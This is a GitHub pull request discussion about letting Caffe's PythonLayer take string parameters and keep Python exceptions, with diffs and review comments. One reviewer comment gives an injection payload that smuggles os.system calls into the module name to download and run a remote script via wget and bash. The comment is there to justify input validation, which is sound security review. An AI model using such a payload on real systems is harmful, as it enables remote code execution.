-
Notifications
You must be signed in to change notification settings - Fork 18.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[Python] PythonLayer takes parameters by string and better exception handling #2001
Conversation
5a2cafa
to
40dc686
Compare
bp::object layer = module.attr(param.python_param().layer().c_str())(param); | ||
bp::object globals = bp::import("__main__").attr("__dict__"); | ||
bp::exec(("import " + module_name).c_str(), globals, globals); | ||
bp::object layer_class = bp::eval((module_name + "." + layer_name).c_str(), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Isn't it dangerous to call eval
and exec
on user strings that haven't been checked for commands? That is, we should first validate that module_name
and layer_name
both match the regex ^[a-zA-Z_][a-zA-Z0-9_]*$
. Without this check, injection attacks like this one are possible:
python_param { ... module: 'os; os.system("wget example.com/malicious.sh"); os.system("bash malicious.sh")' }
I understand that for most use cases, this isn't a concern, but I think it's good practice to avoid introducing unnecessary vulnerabilities.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Agreed with @seanbell that if we're going to eval
/exec
it's worth doing a check like the one he suggests. Is it necessary to switch away from bp::import
though? I'm not sure why it's needed, is it to load __dict__
first? Could param_str
just be a string, and then Python layer writers could eval
it as a dict on their own if they want it to take a dict?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@tnarihi explains the use of eval
/exec
in one of the commit messages ( tnarihi@64a2b04 )
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Ah, thanks, missed that.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
431585b
to
6d4f992
Compare
I just pushed the change to avoid injecting. I didn't add any test case but I checked it works manually. By the way, I am wondering whether we should abort the process or should throw exception when invalid characters are found. I know Caffe doen't throw exceptions and many C++ people don't like to throw exceptions (but I don't know why). From Python perspective, it would be nicer if we could catch all Caffe errors. I know Google logging library always aborts if check failed. Besides that, is there any specific reason that Caffe does not throw? Is there any previous discussion regarding it? |
See #1683 for a discussion of exceptions vs fatal errors. |
Thanks for the pointer, @seanbell. |
Just committed so that regex allows to import nested modules. |
06f8278
to
29ffd98
Compare
Now we can keep the exception information on Python interpreter. This is usefull if you are working on Python interface. You can catch the right Exception class when error occurs in your `PythonLayer`. Now we don't use `PyErr_Print` that clears exceptions. We use `PyErr_Fetch` to get the information and `PyErr_Restore` to restore the exceptions back. And I find that `bp::import` or `bp::object::attr` breaks Python interpreter if a module or an attribute doesn't exist. We now use `bp::exec` and `bp::eval` to keep Python interpreter working even after errors occur. I got the hint from the following page. http://boost.2283326.n4.nabble.com/embedded-python-td2702335.html And I also modified to use `bp::object` for `self_` member.
* Modified Makefile to link boost_regex for PythonLayer. * Travis installs boost_regex * Add a note of a new dependency boost_regex on Makefile.config.example
29ffd98
to
0cf8987
Compare
@@ -128,6 +128,7 @@ if(BUILD_python) | |||
if(PYTHONLIBS_FOUND AND NUMPY_FOUND AND Boost_PYTHON_FOUND) | |||
set(HAVE_PYTHON TRUE) | |||
if(BUILD_python_layer) | |||
find_package(Boost 1.46 COMPONENTS regex) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I changed this line in order to compile successfully with cmake:
find_package(Boost 1.46 COMPONENTS regex python)
Anyway thanks for the PR!
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the fix @stas-sl! Actually I didn't test that in my local since Travis test passed. I will modify it soon.
0b4f686
to
7b96527
Compare
This PR changes two things:
PythonLayer
can take parameters by string format through protobuf. You can see a example of how it can be used atpython/caffe/test/test_python_layer_with_param_str.py
that can be runmake pytest
.I only tested this on my Ubuntu 14.04. I think it should work on different platform if you install boost and python correctly.
Please make sure to uncomment
WITH_PYTHON_LAYER=1
in Makefile.config before tryingPythonLayer
.